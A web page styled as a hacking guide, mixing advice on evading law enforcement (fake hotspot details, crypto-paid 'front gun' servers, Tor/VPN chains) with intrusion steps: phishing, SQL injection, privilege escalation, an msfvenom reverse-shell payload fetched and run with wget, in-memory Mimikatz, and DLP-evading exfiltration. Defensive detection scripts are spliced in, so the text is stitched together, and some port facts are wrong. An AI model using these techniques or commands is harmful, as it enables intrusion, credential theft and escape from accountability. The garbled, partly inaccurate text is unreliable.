Hacking Guide and information


Black hat hackers now more than ever focus on staying safe during hacking.
That means covering their tracks at all times to avoid
being tracked down.

--Blank Slate Hacking
Often they start with a new computer, a new hotspot, a new IP address and new servers
for each hack.

Investigators will typically look for patterns between hacks,
such as: was this IP address seen in another hack? Which browser was used?
Which Gmail/Yahoo/Facebook/Microsoft account was used?
Hackers know that law enforcement agencies do not work alone when conducting an
investigation. They have full access to local ISP records and social media sites, and to
black-ops projects between the governments of the UK, USA, France and Canada.
Much of this exposure came out of the Snowden leaks.

Being Anonymous - Network Anonymity

Hackers know never to use their home/work/university IP address, not even behind multiple layers
of anonymity. If a system glitch occurs it could reveal the real IP address.
A small leak is all it takes for the hacker to be caught by law enforcement.
Once they have the hacker they can pressure them to confess.

First Level - Blend in - Hide in plain sight

Hackers often use public WiFi hotspots, which could be at fast food places (McDonald's, Starbucks, Burger King) or at places with large public gatherings such as malls and train stations.
They want to be sure they are hidden from possible cameras.
When a WiFi hotspot asks for a name they just put in bogus information.
Another popular way is to use a prepaid SIM card paid for in cash.
If it requires email verification they use anonymous mail sites like yopmail.com to create temporary mailboxes for the validation links.

--Second Level
Now the hackers need to smuggle their data safely to avoid detection.
A favourite way is to use the TOR open source network.
It consists of a network of servers that exchange encrypted traffic.
An example: if you are in Germany and connect to the TOR network it will encrypt your data several times and exit from a server in Russia, China, Brazil or another place before reaching the target.
This can make the hacker almost completely anonymous, since the target site cannot
see the original IP address of the hacker, only the exit node.
And because many people use the same exit node it is very difficult for investigators to track
anyone or find any patterns.
Now, TOR is not bullet proof. One way to compromise a TOR user is a malicious website
that injects code into the TOR web browser and installs malware that leaks normal requests, revealing the source IP address and rendering the hacker vulnerable.
Hackers are aware of this and will be very cautious when using TOR, often doing so from public places.
Infecting the TOR browser with malware is a favourite way for government investigators to track TOR users.

Furthermore, there are rumours that federal agencies control a good number of nodes on the TOR network and can track TOR traffic back to the source IP address and identify TOR users.

Another popular way is to use an anonymous VPN provider paid with cryptocurrency.
A VPN is an encrypted connection between two machines that gives the hacker a way to hide their IP address.
The ISP (Internet Service Provider) will not be able to see or spy on the traffic sent over the VPN because of
the encryption used.
A VPN is also useful for avoiding filters and censorship.
The VPN server should be hosted in a country neutral to law enforcement; for example, https://www.privacytools.io lists multiple vendors for reference.

-- Third Level
To sum up, a paranoid hacker would use a public space with a public anonymous hotspot and go via TOR or a VPN server.
In a practical scenario this causes a lot of bandwidth slowness for the hacker.
It can make connections simply too slow because of all the extra hops added for anonymity.
To have a more secure connection but also high bandwidth, hackers will utilize a VPS (Virtual Private Server).
The VPS server, called a Front Gun Server, is paid for in crypto and is hard to track.
They will never pay with a credit card since that is very easy to track down.
The VPS server can run any OS (Operating System); this could be a black hat Linux distribution such as Kali Linux that is filled with hacking tools. If an investigator ever tracks down the VPS Front Gun Server and seizes it, and the hacker only connected via VPN, hiding their IP, the investigator will have a hard time catching the hacker.

Even if a VPN provider is forced to hand over information, it will likely just be an IP address from a public hotspot, which makes it too time consuming and costly for the investigator to proceed.
The investigation cost will outweigh the damage cost and it will simply not be worth it for the investigator
to continue.

And by using a Front Gun server the hacker never has any hacking tools on their private PC.
So even if they get tracked down and their computer is seized, there are no tools on it and it will be hard to
ever prove any hacking activity.

They can even run a read-only operating system such as Tails or Whonix that boots from a USB stick and
removes all traces on reboot.

In the end, what gets hackers caught is getting lazy or too confident and taking shortcuts that skip key security steps.

-- How do Hackers break in?
What do hackers want to get?

  • a: CEOs' emails
  • b: steal and sell business secrets or data
  • c: Credit card information, employee information
  • d: They want to fly under the radar


When a hacker breaks in they will see the target company network:
a firewall, a DMZ zone (blue box) and the internal network (green box).

How do major hacks and penetrations occur?
The most popular ways include:
a: Phishing, for example the Clinton mail hack, where a specially crafted email was sent tricking the user into revealing the password.
In this specific case the non-technical person had already asked the tech department if the mail was safe. They said it was safe, and then it was clicked.
By this the phisher succeeded in fooling both the technical and non-technical personnel.
Typically when attackers deploy phishing attacks they target hundreds of unsuspecting users in an organisation.
This gives them a statistical advantage for breaking in. It is common to achieve as high as a 30% success rate if the campaign is professionally made.
When the attacker wants to perform a phishing campaign they need to obtain organisation information.
This includes:
- A list of employees and their emails
- A good, believable theme in the mail to make the user click. It could be a new Windows or Adobe Reader update.
- A professional black market platform to send the mail from that can circumvent anti-spam and anti-virus appliances


Before attackers deploy a successful phishing campaign they will research topics about the company,
such as:
CVs of employees
Shareholder survey results
Public press releases
General information about the company
Harvesting software to find company personnel email addresses.

The topics used in the phishing mails can be:
Important security updates
CEO mail
Urgent due invoice
Bloomberg report
Negative review about the company
Social media mention about the company
Pretending to be a new employee sending a malware-infected CV.

 

Attackers will perfect the phishing mail to make it look trustworthy and just have a link for the victim to click on.

They register a domain that makes the link look close to the name of the organisation they are pretending to be from, so that it looks trustworthy.
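Defenders can catch the lookalike-domain trick described above before a user ever sees it, by comparing the domain in each inbound sender address or link against the organisation's own domain. The following is an added example, not code from the original page; the protected domain examplecorp.com, the confusable table and the candidate domains are constructed for illustration, and the public-suffix handling is simplified.

```python
import unicodedata

# Confusable characters and digrams mapped to the ASCII letter they imitate.
# Constructed for this example; a production list would be far larger
# (Unicode TR39 confusables).
CONFUSABLES = {
    "0": "o", "1": "l", "3": "e", "4": "a", "5": "s", "7": "t",
    "rn": "m", "vv": "w", "cl": "d",
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p",   # Cyrillic a e o r
    "\u0441": "c", "\u0455": "s", "\u0456": "i", "\u0458": "j",   # Cyrillic s dze i je
    "\u04bb": "h", "\u04cf": "l", "\u0501": "d",                  # shha, palochka, komi de
}


def to_unicode(domain: str) -> str:
    """Decode punycode labels (xn--...) so that homoglyphs become visible."""
    try:
        return domain.encode("ascii").decode("idna")
    except UnicodeError:
        return domain  # already Unicode, or malformed: compare as-is


def normalize(text: str) -> str:
    """Lower-case, strip accents and map confusables to the ASCII they imitate."""
    text = unicodedata.normalize("NFKD", text.lower())
    text = "".join(ch for ch in text if not unicodedata.combining(ch))
    for digram, plain in CONFUSABLES.items():
        if len(digram) == 2:
            text = text.replace(digram, plain)
    return "".join(CONFUSABLES.get(ch, ch) for ch in text)


def levenshtein(a: str, b: str) -> int:
    """Edit distance, for typo-squats such as a doubled or swapped letter."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(candidate: str, protected: str) -> str:
    """Return 'trusted', 'lookalike' or 'unrelated' for a sender or link domain.

    `protected` is the organisation's own registrable domain, e.g.
    'examplecorp.com'. Assumes a one-label public suffix; use a public-suffix
    list for .co.uk-style domains.
    """
    domain = to_unicode(candidate).lower().rstrip(".")
    protected = protected.lower()
    if domain == protected or domain.endswith("." + protected):
        return "trusted"
    brand = protected.split(".")[0]
    if brand in normalize(domain):
        # covers examplecorp.net, examp1ecorp.com, examplecorp.com.evil.net,
        # examplecorp-login.com
        return "lookalike"
    labels = domain.split(".")
    sld = normalize(labels[-2] if len(labels) >= 2 else labels[0]).replace("-", "")
    if levenshtein(sld, brand) <= max(1, len(brand) // 5):
        return "lookalike"
    return "unrelated"


if __name__ == "__main__":
    # Constructed candidates, not real domains.
    for name in ("mail.examplecorp.com", "examp1ecorp.com", "exarnplecorp.com",
                 "ex\u0430mplecorp.com", "examplecorp.com.evil-example.net",
                 "exampelcorp.com", "partner-example.org"):
        print(f"{classify(name, 'examplecorp.com'):10} {name}")
```

A mail gateway would run classify() over the envelope sender, the From: header domain and every link host in the body, and quarantine or tag anything that comes back "lookalike"; the trusted check runs first so the organisation's own subdomains are never flagged.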

Once the attacker gets you to click the link,
they will, as an example, set up a listener on port 443
and launch a malicious VBA payload:
a reverse shell payload generated and copy-pasted into an Excel macro.

The attacker can use fully automated, advanced tools for this process.

The goal of an attacker can be to get a reverse shell; this can allow them to obtain
passwords in clear text.

Attackers are trained to bypass SPH, anti-malware, anti-virus, sandboxes, IDS and IPS,
using different techniques, for example two stagers.

Attackers will often use multiple layers of encryption and obfuscation, for example Veil-Evasion, to bypass anti-virus software.

Veil-Evasion can generate obfuscated Meterpreter shellcode in PowerShell that connects back to the attacker's Front Gun server and gives full access to the target.

Hackers do see anti-virus as a problem.
The weakness of anti-virus is that it is based on signatures: specific data to be flagged, for example flagging a piece of malware by a specific code pattern in a file.
Attackers can simply make malware from scratch that does not match any signature.

And anti-virus only scans on disk. A downloaded file will be scanned. However, some files are injected directly into memory without triggering any alerts, as long
as they never touch the disk.
Attackers use a piece of code called a stager to hold the malicious code encrypted or encoded, and then inject the code into an already existing process in memory.


Reconnaissance
Attackers will start by doing reconnaissance to find all DNS names mapped to a target site.
This way the attacker might find interesting targets that are otherwise not obvious.
It could be intranet.targetdomain, database.targetdomain or career.targetdomain.

One of the attackers' favourite ways of compromising a web / e-commerce site is to look for directory traversal vulnerabilities.
These can reveal configuration files with username and password credentials inside.
It is also useful for the attacker to find files vulnerable to command execution. This can allow a reverse shell to be opened, or whatever the
attacker wishes.
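For the directory traversal class just described, the defect and its fix fit in a few lines. This is an added example, not code from the page: a naive path join beside a checked one. The web root /var/www/app/public is assumed for illustration and need not exist on the machine running it.

```python
import os
from pathlib import Path


def resolve_vulnerable(web_root, requested: str) -> Path:
    """The pattern behind most directory traversal bugs: join the user-supplied
    path onto the web root and open whatever comes out. '..' segments walk out
    of the root."""
    return Path(web_root) / requested


def naive_path(web_root, requested: str) -> str:
    """What the vulnerable handler would actually open, with '..' collapsed."""
    return os.path.normpath(str(resolve_vulnerable(web_root, requested)))


def resolve_safe(web_root, requested: str) -> Path:
    """Join, canonicalise, then verify the result is still under the web root.

    `requested` must already be URL-decoded exactly once; decoding after this
    check would reopen the hole (e.g. %2e%2e%2f). resolve() also follows
    symlinks, so a link inside the root that points outside it is rejected too.
    """
    root = Path(web_root).resolve()
    target = (root / requested.lstrip("/")).resolve()
    if target != root and root not in target.parents:
        raise PermissionError(f"request escapes web root: {requested!r}")
    return target


def is_inside_root(web_root, requested: str) -> bool:
    try:
        resolve_safe(web_root, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    root = "/var/www/app/public"  # assumed web root
    for req in ("images/logo.png", "../../../../etc/passwd",
                "css/../../../../../config.php"):
        verdict = "ok" if is_inside_root(root, req) else "REJECTED"
        print(f"{req:35} naive -> {naive_path(root, req):30} checked -> {verdict}")
```

The check compares canonical paths rather than looking for the substring "..", so encoded, doubled or symlinked variants are all handled by the same two lines; the one thing it cannot fix is decoding the request a second time after the check.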

SQL injection is likewise very important; the attacker can use it to easily make the target SQL database execute malicious commands.
The SQL code must be correct in order for results to show.
Attackers often use the sqlmap tool for the job.
Microsoft SQL Server provides native functions to execute code via xp_cmdshell.

A tool such as sqlmap can be used to identify the SQL backend version.
Examples could be MySQL, PostgreSQL, Azure, Microsoft SQL or Oracle.
Once the attacker knows the SQL version they can use this information to base
other attacks on.
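As an added example (not from the page), the difference between a string-built query and a parameterised one, using Python's built-in sqlite3 so it runs offline. The table contents are constructed placeholders, and the two probes are the textbook ones, included so that the parameterised version's behaviour on the very same input is visible next to the vulnerable one.

```python
import sqlite3


def build_demo_db() -> sqlite3.Connection:
    """In-memory users table with constructed rows; the hashes are placeholders."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw_hash TEXT, role TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (name, pw_hash, role) VALUES (?, ?, ?)",
        [("alice", "placeholder-hash-1", "admin"), ("bob", "placeholder-hash-2", "user")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str):
    """String-built query: the input becomes part of the SQL grammar, so a quote
    in it ends the literal and the rest is parsed as SQL."""
    sql = f"SELECT name, role FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str):
    """Parameterised query: the driver passes the input only as a string value,
    so quotes, OR and UNION inside it are data, never syntax."""
    return conn.execute("SELECT name, role FROM users WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    conn = build_demo_db()
    for probe in ("alice", "x' OR '1'='1", "x' UNION SELECT sqlite_version(), 'probe"):
        print(f"{probe!r:45} vulnerable={lookup_vulnerable(conn, probe)}"
              f" safe={lookup_safe(conn, probe)}")
```

The second probe is the version fingerprint the text mentions: against the string-built query it returns the engine version as a row, against the parameterised query it returns nothing, because no user is literally named that. The fix is the same on every backend named above; only the placeholder syntax differs.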

A popular trick is to obtain the user list from the SQL database.
When the attacker obtains the hashes they can be cracked offline.
Sometimes the hashes are salted (meaning a random string is added to the password before hashing), which makes the cracking slower.

The most common hacks and vulnerabilities are done via web applications.

The Internet is much larger than only what is called the web and web applications.

Other services of interest to attackers can be SSH, TELNET, FTP and RDP.

A very effective way for the attacker to find services
is, for example, to utilize an nmap port scan:
nmap -p- -A iprange/24
This launches nmap against all ports and checks the service on each open port.
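A full-port sweep like the one above is noisy, and that noise is what a defender can detect: one source touching many distinct ports on a host in a short time. Added example, not from the page: a sliding-window count of distinct (host, port) targets per source over constructed iptables-style log lines; the log format, the addresses and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta


def constructed_firewall_log():
    """Constructed iptables-style log (not real traffic): one host sweeps 30
    ports in ten seconds, one normal client talks to two services."""
    base = datetime(2024, 5, 1, 10, 0, 0)
    lines = []
    for i, port in enumerate(range(1, 31)):
        ts = (base + timedelta(seconds=i // 3)).isoformat()
        lines.append(f"{ts} SRC=203.0.113.9 DST=198.51.100.10 PROTO=TCP DPT={port}")
    for i in range(5):
        ts = (base + timedelta(minutes=i)).isoformat()
        lines.append(f"{ts} SRC=10.0.0.5 DST=198.51.100.10 PROTO=TCP DPT=443")
    ts = (base + timedelta(minutes=2)).isoformat()
    lines.append(f"{ts} SRC=10.0.0.5 DST=198.51.100.11 PROTO=TCP DPT=80")
    return lines


def parse_line(line: str):
    """'<iso time> KEY=VALUE ...' -> (timestamp, src, dst, dst port)."""
    ts, *fields = line.split()
    kv = dict(f.split("=", 1) for f in fields)
    return datetime.fromisoformat(ts), kv["SRC"], kv["DST"], int(kv["DPT"])


def detect_scanners(lines, window=timedelta(seconds=60), min_targets=20):
    """Flag sources that touch >= min_targets distinct (host, port) pairs within
    any `window`. Returns {src: largest distinct-target count seen in one window}."""
    events = defaultdict(list)
    for line in lines:
        if line.strip():
            ts, src, dst, dpt = parse_line(line)
            events[src].append((ts, dst, dpt))
    alerts = {}
    for src, evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):
            # slide the window start forward until it fits
            while evs[end][0] - evs[start][0] > window:
                start += 1
            targets = {(d, p) for _, d, p in evs[start:end + 1]}
            if len(targets) >= min_targets:
                alerts[src] = max(alerts.get(src, 0), len(targets))
    return alerts


if __name__ == "__main__":
    for src, count in detect_scanners(constructed_firewall_log()).items():
        print(f"possible port scan from {src}: {count} distinct targets within 60s")
```

A slow scan spread over hours slips under a 60-second window, which is why production detections usually keep a second, longer window with a higher threshold alongside this one.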


A popular easy-to-hack service is on TCP port 27019,
the default port used by MongoDB.

So it is easy for an attacker to find them by going to the Shodan search engine and searching:

search Product:MongoDB

A popular port that is also looked for is TCP port 3389.
This port can allow remote access to a Windows machine with rdesktop.

The goal for attackers is to reach the green box internal network, which is behind the blue box external network.

SQL injection on an MS SQL server running as the DBA account: commands are executed with xp_cmdshell, which has the highest privileges.

When connected to the blue box they need to get elevated permissions in order to clean up and stop logging.

To get root they would look for a program that executes files with higher privileges,

for example:
find / -type f \( -perm -04000 -o -perm -02000 \) -exec ls -l {} \;

It could be a program that runs a file:
echo -e "#!/bin/bash\n/bin/bash" > /tmp/install.sh
/app/product/def_policy
sudo su
id

Tools such as linuxprivchecker.py can also assist in the process.
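The same SUID/SGID search used for privilege escalation is, for a defender, an integrity check: the set of setuid and setgid files on a host should be known and stable, and a new one appearing is worth an alert. Added example, not from the page: a Python equivalent of the find command above plus a baseline comparison; the demo tree is constructed in a temporary directory so it runs without root.

```python
import os
import stat
import sys
import tempfile


def find_setuid_setgid(root: str):
    """Return sorted (path, permission bits) for regular files under `root`
    that carry the setuid or setgid bit. Symlinks are not followed."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # vanished or unreadable; skip rather than abort the sweep
            if stat.S_ISREG(st.st_mode) and st.st_mode & (stat.S_ISUID | stat.S_ISGID):
                found.append((path, stat.S_IMODE(st.st_mode)))
    return sorted(found)


def compare_with_baseline(found, baseline):
    """`baseline` is the set of paths the image is known to ship with these bits.
    A new entry is a candidate persistence mechanism or a risky install; a
    missing one means the baseline is stale or something was removed."""
    current = {path for path, _ in found}
    return {"new": sorted(current - set(baseline)),
            "missing": sorted(set(baseline) - current)}


def make_demo_tree():
    """Constructed tree for a self-contained run: one setuid file, one setgid
    file, one plain file. Returns (root, findings as read back after chmod)."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    modes = {"setuid_bin": 0o4755, "setgid_bin": 0o2755, "plain": 0o755}
    for name, mode in modes.items():
        path = os.path.join(root, name)
        with open(path, "w"):
            pass
        os.chmod(path, mode)
    expected = []
    for name in modes:
        path = os.path.join(root, name)
        bits = stat.S_IMODE(os.lstat(path).st_mode)
        if bits & (stat.S_ISUID | stat.S_ISGID):
            expected.append((path, bits))
    return root, sorted(expected)


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "/usr/bin"
    for path, bits in find_setuid_setgid(root):
        print(f"{bits:04o} {path}")
```

Run it against / at image build time, store the result as the baseline, and compare periodically; the "new" list is the one that matters, because a world-executable setuid shell wrapper like the /tmp/install.sh trick above shows up there immediately.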


SOCKS proxy for opening access for the attacker.
Popular ports for a SOCKS proxy can be TCP port 5555, TCP port 1521 and TCP port 9050.


Rules that allow the firewall to forward the ports:
iptables -t nat -A PREROUTING -s IP -p tcp -i eth1 --dport 80 -j DNAT --to-destination targetweb:1521

The attacker can also use the Metasploit suite,
in this case to generate a Meterpreter executable.
Example:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=443 -f elf > package

Then start the reverse_tcp handler:
set LHOST IP
set LPORT 443
run

This way it is easier to download the file onto a third party:
wget http://serverip/package
chmod +x package && ./package

Java web servers: Tomcat, JBoss, Jenkins.
Admin consoles.
Common ports they run on are 8080, 8443, 8081 and 8888.

Vulnerable ones are JMX-console, Web-console and JMXInvokerServlet.

Another trick on Windows platforms is to run:
powershell -exec bypass
and find interesting files such as:

dir /b /s "*.bat"
dir /b /s "*.cmd"
dir /b /s "*.vbs"
dir /b /s "*.vba"
dir /b /s "*.vbe"
dir /b /s "*.ps1"
dir /b /s "*.config"
dir /b /s "*.ini"

Common Windows accounts are admin_mnt & admin_svc.
Attackers abuse the NTLM protocol suite, which uses both hashing and challenge-response.

Windows passwords are stored as LM and NTLM hashes, in the form User:LM:NTLM.
The NTLM hash is MD4 applied to the Unicode (UTF-16LE) password, giving a 128-bit value.
It is very fast to brute force.

When a user sits at the keyboard and logs in, Windows calculates the hash of the password typed by the user and compares it with the stored value.

Over the network it relies on a challenge-response protocol to authenticate users.
The server sends a challenge to the client workstation.
The workstation encrypts it with the user's password hash and sends it back to the server.

Sneaky attackers can exploit this to obtain the hash of the administrator password without knowing the password itself, and gain access to multiple machines over the network.

Another problem on Windows is that passwords are stored in memory in the Local Security Authority Subsystem Service (LSASS) process.
Via undocumented Windows functions, tools like Mimikatz can decrypt them.

Active Directory is used by Windows machines in a corporate environment linked together to share resources.
The root node in a Windows Active Directory is called a forest. Its purpose is to contain domains: groups of users that share the same configuration.
Each domain can have its own passwords, update schedule and user accounts.
There are two types of users: local users, with hashes stored locally on the server, and domain users, with hashes stored on the domain controller.

A domain user can then connect to all workstations in the domain.

Attackers can circumvent UAC, introduced in Windows Vista, which prompts users with a pop-up dialogue box before executing privileged actions.
This is because the default administrator account is not subject to UAC.

This way they can run in memory: download Invoke-Mimikatz and run it in PowerShell without storing any files on disk.

They can use remote PowerShell execution via the WinRM service on TCP port 5985.

Another WMI remote execution tool can also be used.

Attackers are also known to use the Golden Ticket, a Kerberos ticket valid for 10 years, to impersonate users.

What do attackers typically go after once they have gained access?

CEO email
Secret business information
HR files
Strategic files
Marketing strategy
Logins to other sites like social media
Leaking customer records

Attackers are careful when retrieving the data not to trigger defences like Data Loss Prevention (DLP) systems.

Often they need to get gigabytes of data out without being discovered.

For example, if the attackers take 50-100 gigabytes out in one attempt it can trigger systems and cause an investigation.

To circumvent it they will fragment the data by making multiple zip files and converting them into an old text file format.

The most common way to upload the files out is simply to transmit them over HTTPS, or to use a more advanced technique and send them via DNS queries.

Sites such as Pastebin are very popular as well.
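Exfiltration over DNS queries, as mentioned above, leaves a recognisable pattern in resolver logs: many queries to one domain whose labels below it are long and high-entropy, each one different. Added example, not from the page: a detector over constructed resolver log lines; the log format, the thresholds and the domain tunnel-example.net are assumptions, and the hex chunks stand in for encoded data.

```python
import hashlib
import math
from collections import defaultdict


def shannon_entropy(s: str) -> float:
    """Bits per character; 4.0 is the maximum for hex, ~1.5 for plain hostnames."""
    if not s:
        return 0.0
    n = len(s)
    return -sum((s.count(ch) / n) * math.log2(s.count(ch) / n) for ch in set(s))


def constructed_resolver_log():
    """Constructed resolver log lines: '<time> <client> <qtype> <qname>'.
    One client browses normally; another pushes hex chunks out in TXT queries."""
    lines = []
    for i in range(10):
        lines.append(f"10:00:{i:02d} 10.0.0.5 A www.examplecorp.com")
    for i in range(5):
        lines.append(f"10:01:{i:02d} 10.0.0.5 A mail.examplecorp.com")
    for i in range(3):
        lines.append(f"10:02:{i:02d} 10.0.0.5 A api.partner-example.org")
    for i in range(12):
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()  # stands in for encoded data
        lines.append(f"10:03:{i:02d} 10.0.0.7 TXT {chunk[:32]}.{chunk[32:]}.t.tunnel-example.net")
    return lines


def base_domain(qname: str) -> str:
    # Assumption: one-label public suffix; use a public-suffix list in production.
    return ".".join(qname.rstrip(".").split(".")[-2:])


def detect_dns_tunnels(lines, min_queries=10, min_payload_len=30, min_entropy=3.0):
    """Per (client, base domain): count queries and measure how long and how
    random the part below the base domain is. Returns the flagged pairs."""
    stats = defaultdict(lambda: {"queries": 0, "payload_chars": 0,
                                 "entropy_sum": 0.0, "names": set()})
    for line in lines:
        if not line.strip():
            continue
        _ts, client, _qtype, qname = line.split()
        base = base_domain(qname)
        # everything below the base domain, with the label dots removed
        payload = qname[: -len(base) - 1].replace(".", "") if qname != base else ""
        s = stats[(client, base)]
        s["queries"] += 1
        s["payload_chars"] += len(payload)
        s["entropy_sum"] += shannon_entropy(payload)
        s["names"].add(qname)
    alerts = {}
    for key, s in stats.items():
        mean_len = s["payload_chars"] / s["queries"]
        mean_entropy = s["entropy_sum"] / s["queries"]
        if (s["queries"] >= min_queries and mean_len >= min_payload_len
                and mean_entropy >= min_entropy):
            alerts[key] = {"queries": s["queries"],
                           "mean_payload_len": round(mean_len, 1),
                           "mean_entropy": round(mean_entropy, 2),
                           "unique_names": len(s["names"])}
    return alerts


if __name__ == "__main__":
    for (client, domain), info in detect_dns_tunnels(constructed_resolver_log()).items():
        print(f"possible DNS tunnel: {client} -> {domain} {info}")
```

The unique-name count is the discriminator against legitimate high-volume services: a busy CDN hostname is queried thousands of times but is the same name every time, whereas exfiltration must change the label with every chunk, or the resolver cache would answer it and nothing would leave the network.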

Sensitive data can also be easy for the attacker to grab via network shares.

To obtain sensitive emails they will look for the email .OST file located in the user's local Outlook folder.


S/MIME is a protocol used to securely exchange emails based on public key infrastructure.
It can be used to encrypt mails, even though this is very rare.
Several tools can still be used to dump the unencrypted mails from memory.

When obtaining access to remote systems they bypass UAC with the bypassuac_eventvwr module.